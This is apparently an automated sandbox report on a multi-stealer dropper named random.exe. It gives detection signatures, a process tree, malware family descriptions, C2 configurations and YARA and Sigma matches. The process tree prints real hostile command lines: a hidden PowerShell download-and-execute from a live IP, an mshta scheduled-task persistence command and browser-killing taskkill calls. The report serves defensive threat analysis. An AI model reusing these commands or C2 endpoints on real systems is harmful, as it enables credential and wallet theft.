Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1604684
MD5:	c5755c3a37da95ca4b17861fe5ace4ce
SHA1:	4d95f09ebace4dd55b8f51a538c0e57cdf8ac9e6
SHA256:	1a1572c3aa96c35ea02ad8fd2bfc3886bf5c3613c7877bc1e5385311078a6751
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

Amadey, Credential Flusher, Cryptbot, LummaC Stealer, RedLine, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and execute file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar stealer

Yara detected obfuscated html page

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Creates HTA files

Creates multiple autostart registry keys

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

Leaks process information

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Powershell drops PE file

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell DownloadFile

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to download and execute files (via powershell)

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

random.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\random.exe" MD5: C5755C3A37DA95CA4B17861FE5ACE4CE)

AGDDD2MYZL6KQO94XW.exe (PID: 7648 cmdline: "C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe" MD5: A1CC97D26B532F7581F322FF228F337F)

chrome.exe (PID: 4432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=2076,i,11199878792390717123,11116192396137881968,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

HYCURX00F7L1ZQ3FYN.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe" MD5: 5D13EA58C9BD61E51034782C4A5F39FE)

skotes.exe (PID: 8076 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 5D13EA58C9BD61E51034782C4A5F39FE)

skotes.exe (PID: 8124 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 5D13EA58C9BD61E51034782C4A5F39FE)

skotes.exe (PID: 8160 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 5D13EA58C9BD61E51034782C4A5F39FE)

5f198671b1.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe" MD5: 4E4A0CB9E2FA6ADF04D29FAC622E2927)

1cfdc82c16.exe (PID: 2316 cmdline: "C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe" MD5: D3378389997FBD28AC2941F180A190FA)

275588fe9c.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe" MD5: F662CB18E04CC62863751B672570BD7D)

conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

0436fcd702.exe (PID: 7808 cmdline: "C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe" MD5: 28EB15252AEA9690429C884AF46857F9)

NEGM0426B51QOF76X3GO8.exe (PID: 2140 cmdline: "C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe" MD5: A1CC97D26B532F7581F322FF228F337F)

48b7eec64e.exe (PID: 4960 cmdline: "C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe" MD5: A1CC97D26B532F7581F322FF228F337F)

f8fdf848d8.exe (PID: 8100 cmdline: "C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe" MD5: F49FF6C92F6DA6A8E6654F2B59670C92)

taskkill.exe (PID: 1508 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 1072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3604 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5216 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3524 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5568 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 6388 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

ec93a94e48.exe (PID: 2164 cmdline: "C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe" MD5: 40908C811779DDF5AC6759F32176507A)

cmd.exe (PID: 5040 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7696 cmdline: schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)

mshta.exe (PID: 5356 cmdline: mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 3940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE (PID: 732 cmdline: "C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE" MD5: 5D13EA58C9BD61E51034782C4A5F39FE)

071b4af2c1.exe (PID: 7052 cmdline: "C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe" MD5: 597D6D284139BBE1A0AD320AB27FDD85)

fee976e9bb.exe (PID: 5304 cmdline: "C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe" MD5: 5E9CDFD53175A7839150093CC80D668A)

f64eac2185.exe (PID: 3444 cmdline: "C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe" MD5: 8202CF5E3C9C273DEB62E34476EF2FFB)

0436fcd702.exe (PID: 5124 cmdline: "C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe" MD5: 28EB15252AEA9690429C884AF46857F9)

mshta.exe (PID: 6184 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 6668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 6544 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7580 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 7212 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2212 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a2266e4-e5c8-46c4-9ed2-0ac5c5747635} 7580 "\\.\pipe\gecko-crash-server-pipe.7580" 24596270d10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 5808 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3824 -parentBuildID 20230927232528 -prefsHandle 4176 -prefMapHandle 4172 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1747f5ed-c481-48a3-bac7-b516bc97bf80} 7580 "\\.\pipe\gecko-crash-server-pipe.7580" 245a8122e10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 1904 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5564 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5432 -prefMapHandle 5544 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91d2bf84-dcf7-46d6-a793-f4350282039f} 7580 "\\.\pipe\gecko-crash-server-pipe.7580" 245a6c4c310 utility MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

48b7eec64e.exe (PID: 8016 cmdline: "C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe" MD5: A1CC97D26B532F7581F322FF228F337F)

f8fdf848d8.exe (PID: 4456 cmdline: "C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe" MD5: F49FF6C92F6DA6A8E6654F2B59670C92)

taskkill.exe (PID: 5284 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.lexfo.fr/StealC_malware_analysis_part1.html https://blog.lexfo.fr/StealC_malware_analysis_part2.html https://blog.lexfo.fr/StealC_malware_analysis_part3.html https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": "https://rampnatleadk.click/api", "Build Version": "fBkCmu--labinstall"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: Cryptbot

{"C2 list": ["home.fivegg5th.top", ".fivgg5th.top", ".fivhttph.top", "gPhome.fivegg5th.top", "a.dnspod.comh.top"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000003.2591876244.00000000014B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1887563920.0000000005230000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000012.00000002.2599584604.0000000000E51000.00000040.00000001.01000000.00000015.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000002F.00000003.2747944923.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000007.00000003.1945172239.0000000004E20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002E.00000002.2794527881.0000000000091000.00000040.00000001.01000000.00000020.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000D.00000003.2478350296.000000000075A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000003.1940237462.0000000004B60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2177777866.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000003.2445420622.0000000004D70000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000007.00000002.1985380947.0000000000781000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000002.2597406070.00000000009CE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000006.00000002.1981707375.0000000000781000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.1953240944.0000000000CC1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000003.2552141313.0000000004F30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.2178019911.0000000000F51000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000B.00000003.2199394159.0000000004880000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002E.00000003.2747338308.00000000046E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000003.1912936002.0000000005120000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: random.exe PID: 7320	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: random.exe PID: 7320	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: random.exe PID: 7320	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: AGDDD2MYZL6KQO94XW.exe PID: 7648	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: AGDDD2MYZL6KQO94XW.exe PID: 7648	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: AGDDD2MYZL6KQO94XW.exe PID: 7648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AGDDD2MYZL6KQO94XW.exe PID: 7648	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 5f198671b1.exe PID: 7960	JoeSecurity_Cryptbot_1	Yara detected Cryptbot	Joe Security
Process Memory Space: 1cfdc82c16.exe PID: 2316	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 1cfdc82c16.exe PID: 2316	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 1cfdc82c16.exe PID: 2316	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 275588fe9c.exe PID: 7880	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 275588fe9c.exe PID: 7880	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 275588fe9c.exe PID: 7880	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 275588fe9c.exe PID: 7880	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x33c12:$a4: get_ScannedWallets 0x32ab9:$a5: get_ScanTelegram 0x3389b:$a6: get_ScanGeckoBrowsersPaths 0x3174c:$a7: <Processes>k__BackingField 0x2ec7f:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x31080:$a9: <ScanFTP>k__BackingField
Process Memory Space: 0436fcd702.exe PID: 7808	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0436fcd702.exe PID: 7808	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0436fcd702.exe PID: 7808	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 48b7eec64e.exe PID: 4960	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 48b7eec64e.exe PID: 4960	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: f8fdf848d8.exe PID: 8100	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Process Memory Space: mshta.exe PID: 5356	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3940	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: mshta.exe PID: 6184	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 48b7eec64e.exe PID: 8016	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 48b7eec64e.exe PID: 8016	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 44 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.skotes.exe.780000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
6.2.skotes.exe.780000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
46.2.TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.90000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.HYCURX00F7L1ZQ3FYN.exe.cc0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_3940.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_6668.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe, ParentProcessId: 2164, ParentProcessName: ec93a94e48.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 5040, ProcessName: cmd.exe

